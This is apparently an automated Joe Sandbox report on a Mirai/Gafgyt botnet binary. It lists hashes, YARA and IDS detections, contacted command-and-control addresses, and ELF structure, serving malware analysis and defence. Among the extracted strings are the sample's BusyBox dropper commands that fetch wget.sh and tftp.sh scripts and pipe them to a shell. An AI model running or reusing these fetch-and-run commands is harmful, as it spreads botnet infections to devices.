Linux Analysis Report
i686.elf

Overview

General Information

Sample name: i686.elf
Analysis ID: 1584245
MD5: 20f4bca1aa1a3bcdf7d2b60cea290831
SHA1: 379f98b65a29576975c8c55b91badc0d940e630b
SHA256: 95b557c53a7d8165212c78caf9c2cfc8dfb56b796dbdcade66655b41b5f766e1
Tags: elf, user-abuse_ch

Detection

Mirai
Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Machine Learning detection for sample
Performs DNS TXT record lookups
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584245
Start date and time: 2025-01-04 23:57:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Sample name: i686.elf
Detection: MAL
Classification: mal92.troj.evad.linELF@0/1@28/0
  • VT rate limit hit for: i686.elf
Command: /tmp/i686.elf
PID: 6252
Exit Code: 0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB aNd fOxNoIntel lEarNs sHiT
Standard Error:
  • system is lnxubuntu20
  • i686.elf (PID: 6252, Parent: 6175, MD5: 20f4bca1aa1a3bcdf7d2b60cea290831) Arguments: /tmp/i686.elf
    • i686.elf New Fork (PID: 6253, Parent: 6252)
    • i686.elf New Fork (PID: 6254, Parent: 6252)
    • i686.elf New Fork (PID: 6268, Parent: 6252)
    • i686.elf New Fork (PID: 6289, Parent: 6252)
    • i686.elf New Fork (PID: 6314, Parent: 6252)
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source: i686.elf, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: i686.elf, Rule: Linux_Trojan_Gafgyt_9e9530a7, Description: unknown, Author: unknown
  • 0xe168:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
Source: i686.elf, Rule: Linux_Trojan_Gafgyt_807911a2, Description: unknown, Author: unknown
  • 0xe957:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
Source: i686.elf, Rule: Linux_Trojan_Gafgyt_d4227dbf, Description: unknown, Author: unknown
  • 0xa66a:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0xa7cc:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
Source: i686.elf, Rule: Linux_Trojan_Gafgyt_d996d335, Description: unknown, Author: unknown
  • 0x1138a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0

Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Author: Joe Security
Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_9e9530a7, Description: unknown, Author: unknown
  • 0xe168:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_807911a2, Description: unknown, Author: unknown
  • 0xe957:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_d4227dbf, Description: unknown, Author: unknown
  • 0xa66a:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0xa7cc:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, Rule: Linux_Trojan_Gafgyt_d996d335, Description: unknown, Author: unknown
  • 0x1138a:$a: D0 EB 0F 40 38 37 75 04 48 89 F8 C3 49 FF C8 48 FF C7 4D 85 C0
Timestamp: 2025-01-05T00:00:00.819729+0100, SID: 2013514, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 192.168.2.23, Source Port: 43689, Destination IP: 195.10.195.195, Destination Port: 53, Protocol: UDP


      AV Detection

      Source: i686.elf, ReversingLabs: Detection: 26%
      Source: i686.elf, Joe Sandbox ML: detected

      Networking

      Source: Network traffic, Suricata IDS: 2013514 - Severity 1 - ET MALWARE Potential DNS Command and Control via TXT queries : 192.168.2.23:43689 -> 195.10.195.195:53
      Source: global traffic, TCP traffic: 38.60.221.89 ports 18234,45123,0,1,62849,2,3,31428,10321
      Source: global traffic, TCP traffic: 156.244.6.20 ports 45123,1,2,3,8,9,19823,5429
      Source: global traffic, TCP traffic: 188.166.182.194 ports 49657,64715,3,5,7,8,31428,5837
      Source: global traffic, TCP traffic: 192.168.2.23:46228 -> 38.60.221.89:10321
      Source: global traffic, TCP traffic: 192.168.2.23:54650 -> 188.166.182.194:5837
      Source: global traffic, TCP traffic: 192.168.2.23:37076 -> 156.244.6.20:19823
      Source: global traffic, UDP traffic: 192.168.2.23:42241 -> 74.125.250.129:19302
      Source: /tmp/i686.elf (PID: 6252), Socket: 127.0.0.1:43478
      Source: global traffic, TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: global traffic, TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global traffic, TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknown, TCP traffic detected without corresponding DNS query: 131.24.86.106
      Source: unknown, TCP traffic detected without corresponding DNS query: 53.205.207.166
      Source: unknown, TCP traffic detected without corresponding DNS query: 106.19.70.44
      Source: unknown, TCP traffic detected without corresponding DNS query: 38.60.221.89
      Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.43
      Source: unknown, TCP traffic detected without corresponding DNS query: 109.202.202.202
      Source: unknown, TCP traffic detected without corresponding DNS query: 188.166.182.194
      Source: global traffic, DNS traffic detected: DNS query: ai.stackoverflow.libre
      Source: i686.elf, String found in binary or memory: http:///curl.sh
      Source: i686.elf, String found in binary or memory: http:///wget.sh
      Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_1cb033f3, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
      Source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_1cb033f3, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_807911a2, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_d996d335, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_620087b9, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Gafgyt_33b4111a, Author: unknown
      Source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY, Matched rule: Linux_Trojan_Mirai_1cb033f3, Author: unknown
      Source: Initial sample, String containing 'busybox' found: usage: busybox
      Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sample, String containing 'busybox' found: /bin/busybox
      Source: Initial sample, String containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sample, String containing 'busybox' found: /bin/busybox echo >
      Source: Initial sample, String containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sample, String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sample, String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sample, String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: ELF static info symbol of initial sample, .symtab present: no
      Source: /tmp/i686.elf (PID: 6253), SIGKILL sent: pid: 936, result: successful
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_9e9530a7, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_807911a2, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d4227dbf, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_d996d335, reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_620087b9, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Gafgyt_33b4111a, reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: i686.elf, type: SAMPLE, Matched rule: Linux_Trojan_Mirai_1cb033f3, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: classification engine, Classification label: mal92.troj.evad.linELF@0/1@28/0

      Data Obfuscation

      Source: /tmp/i686.elf (PID: 6254), File: /etc/config
      Source: /tmp/i686.elf (PID: 6254), Directory: /root/.cache
      Source: /tmp/i686.elf (PID: 6254), Directory: /root/.ssh
      Source: /tmp/i686.elf (PID: 6254), Directory: /root/.config
      Source: /tmp/i686.elf (PID: 6254), Directory: /root/.local
      Source: /tmp/i686.elf (PID: 6254), Directory: /tmp/.X11-unix
      Source: /tmp/i686.elf (PID: 6254), Directory: /tmp/.Test-unix
      Source: /tmp/i686.elf (PID: 6254), Directory: /tmp/.font-unix
      Source: /tmp/i686.elf (PID: 6254), Directory: /tmp/.ICE-unix
      Source: /tmp/i686.elf (PID: 6254), Directory: /tmp/.XIM-unix
      Source: /tmp/i686.elf (PID: 6254), Directory: /etc/.java
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/230/fdJump to behavior

      Hooking and other Techniques for Hiding and Protection

      Source: /tmp/i686.elf (PID: 6254), Log files deleted: /var/log/kern.log

      HIPS / PFW / Operating System Protection Evasion

      Source: Traffic, DNS traffic detected: queries for: ai.stackoverflow.libre

      Stealing of Sensitive Information

      Source: Yara match, File source: i686.elf, type: SAMPLE
      Source: Yara match, File source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara match, File source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match, File source: i686.elf, type: SAMPLE
      Source: Yara match, File source: 6252.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara match, File source: 6289.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 Hidden Files and Directories | 1 OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Indicator Removal | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction

      No configs have been found
      [Behavior Graph ID: 1584245, Sample: i686.elf, Startdate: 04/01/2025, Architecture: LINUX, Score: 92. Figure not reproduced. Nodes shown: the i686.elf process starting further i686.elf processes and 2 other processes; ai.stackoverflow.libre; 156.244.6.20 (ports 19823, 37076, 45123; POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles); 9 other IPs or domains. Signatures shown: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Performs DNS TXT record lookups; Sample tries to access files in /etc/config/ (typical for OpenWRT routers); Deletes system log files; 3 other signatures.]

      Source | Detection | Scanner | Label
      i686.elf | 26% | ReversingLabs | Linux.Trojan.Mirai
      i686.elf | 100% | Joe Sandbox ML |
      No Antivirus matches


      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      ai.stackoverflow.libre | unknown | unknown | true |  | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      http:///wget.sh | i686.elf | false |  | high
      http:///curl.sh | i686.elf | false |  | high

      IP | Domain | Country | ASN | ASN Name | Malicious
      106.19.70.44 | unknown | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | false
      38.60.221.89 | unknown | United States | 174 | COGENT-174US | true
      53.205.207.166 | unknown | Germany | 31399 | DAIMLER-ASITIGNGlobalNetworkDE | false
      109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false
      156.244.6.20 | unknown | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
      188.166.182.194 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
      131.24.86.106 | unknown | United States | 385 | AFCONC-BLOCK1-ASUS | false
      74.125.250.129 | unknown | United States | 15169 | GOOGLEUS | false
      91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
      91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false

      Process:/tmp/i686.elf
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):146
      Entropy (8bit):4.024394204278479
      Encrypted:false
      SSDEEP:3:TBGTD+FN5CSNE4F58SASI7AWHF5x5mAR/VB6GEDwcL7uoL/:TBGD+5F+RLl0AR/VgGEDLHB/
      MD5:E77B19565FA2C8C6B780A198F3889313
      SHA1:4B18D7D88944804C96620323D60EE89E4B985BB4
      SHA-256:F71785724FCE340C9FF9CD4341B920A602A47C0B496C57CCA177B94CB4BA297D
      SHA-512:D22AAC8ADD55BCD9672465F3E67AF9DD4B69C0C85903C16A1C19ABDEA59EA0674DF69FF7D7F646FE642417103C7D4B6B5B3B1D5A8017C321417CBC5B3C243732
      Malicious:false
      Reputation:low
      Preview:The gods watch from the heavens? Let them see what a mortal can become. let them witness a man who defies their will and carves his own destiny...

      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):6.273347609395402
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:i686.elf
      File size:91'792 bytes
      MD5:20f4bca1aa1a3bcdf7d2b60cea290831
      SHA1:379f98b65a29576975c8c55b91badc0d940e630b
      SHA256:95b557c53a7d8165212c78caf9c2cfc8dfb56b796dbdcade66655b41b5f766e1
      SHA512:4e962cfbf785d81a2273744c1cb390a19592846db6ab834f3c53179b044eec5d0367e780f3873e4377c9641731027aefb770fb2bfc1204147de0b039eea221ef
      SSDEEP:1536:1AgJggzdmYmvPmoHuu00iidGErSUCCkClTRMWxBseLIF26Oc/HMDkBK:SgJgkmYmvPmlMiid3UClmWf7IF26/sn
      TLSH:2293295775C0CDFDC48AC9394A5B913AE632F16D2221734B2794BB312E8EE213F1E529

      ELF header

      Class:ELF64
      Data:2's complement, little endian
      Version:1 (current)
      Machine:Advanced Micro Devices X86-64
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x400194
      Flags:0x0
      ELF Header Size:64
      Program Header Offset:64
      Program Header Size:56
      Number of Program Headers:3
      Section Header Offset:91152
      Section Header Size:64
      Number of Section Headers:10
      Header String Table Index:9
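
      Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
       | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
      .init | PROGBITS | 0x4000e8 | 0xe8 | 0x13 | 0x0 | 0x6 | AX | 0 | 0 | 1
      .text | PROGBITS | 0x400100 | 0x100 | 0x11706 | 0x0 | 0x6 | AX | 0 | 0 | 16
      .fini | PROGBITS | 0x411806 | 0x11806 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 1
      .rodata | PROGBITS | 0x411820 | 0x11820 | 0x4510 | 0x0 | 0x2 | A | 0 | 0 | 32
      .ctors | PROGBITS | 0x515d38 | 0x15d38 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
      .dtors | PROGBITS | 0x515d48 | 0x15d48 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
      .data | PROGBITS | 0x515d60 | 0x15d60 | 0x670 | 0x0 | 0x3 | WA | 0 | 0 | 32
      .bss | NOBITS | 0x5163e0 | 0x163d0 | 0x6ae8 | 0x0 | 0x3 | WA | 0 | 0 | 32
      .shstrtab | STRTAB | 0x0 | 0x163d0 | 0x3e | 0x0 | 0x0 |  | 0 | 0 | 1

      Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
      LOAD | 0x0 | 0x400000 | 0x400000 | 0x15d30 | 0x15d30 | 6.3408 | 0x5 | R E | 0x100000 |  | .init .text .fini .rodata
      LOAD | 0x15d38 | 0x515d38 | 0x515d38 | 0x698 | 0x7190 | 2.5611 | 0x6 | RW | 0x100000 |  | .ctors .dtors .data .bss
      GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 |  |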


      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
      2025-01-05T00:00:00.819729+0100 | 2013514 | ET MALWARE Potential DNS Command and Control via TXT queries | 1 | 192.168.2.23 | 43689 | 195.10.195.195 | 53 | UDP

      • Total Packets: 149
      • 5 Ports have been hidden.
      • 23 (Telnet)
      • 53 (DNS)
      • 80 (HTTP)
      • 443 (HTTPS)
      • 5429 undefined
      • 5837 undefined
      • 10321 undefined
      • 18234 undefined
      • 19302 undefined
      • 19823 undefined

      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Jan 4, 2025 23:57:56.006413937 CET103214622838.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:57:56.006470919 CET4622810321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:57:59.660355091 CET42836443192.168.2.2391.189.91.43
                                                      Jan 4, 2025 23:58:01.196140051 CET4251680192.168.2.23109.202.202.202
                                                      Jan 4, 2025 23:58:12.492338896 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:12.497240067 CET103214623038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:12.497292995 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:13.500531912 CET103214623038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:13.500613928 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:13.500613928 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:13.505623102 CET103214623038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:13.505667925 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:14.506309032 CET43928443192.168.2.2391.189.91.42
                                                      Jan 4, 2025 23:58:26.792589903 CET42836443192.168.2.2391.189.91.43
                                                      Jan 4, 2025 23:58:30.024395943 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:30.029485941 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:30.029546022 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:30.888060093 CET4251680192.168.2.23109.202.202.202
                                                      Jan 4, 2025 23:58:31.041831970 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:31.041960955 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:31.041989088 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:31.046926022 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:31.046974897 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:31.047065020 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:45.559104919 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:45.563940048 CET103214623438.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:45.564021111 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:46.585069895 CET103214623438.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:46.585134983 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:46.585134983 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:46.590125084 CET103214623438.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:46.590212107 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:55.460622072 CET43928443192.168.2.2391.189.91.42
                                                      Jan 4, 2025 23:58:57.239820004 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:57.244667053 CET583754650188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:58:57.244729996 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:58.065284014 CET583754650188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:58:58.065356970 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:58.240580082 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:58.245616913 CET583754650188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:58:58.245678902 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:08.714560032 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:08.719434977 CET3142833840188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:08.719501972 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:09.565321922 CET3142833840188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:09.565387011 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:09.715706110 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:09.720818996 CET3142833840188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:09.720879078 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:22.300407887 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:22.305286884 CET451235229038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:59:22.305325031 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:23.315282106 CET451235229038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:59:23.315330029 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:23.315330029 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:23.320488930 CET451235229038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:59:23.320533037 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:35.844572067 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:35.849332094 CET583754656188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:35.849391937 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:36.687613010 CET583754656188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:36.687669992 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:36.845360041 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:36.850409031 CET583754656188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:36.850456953 CET546565837192.168.2.23188.166.182.194
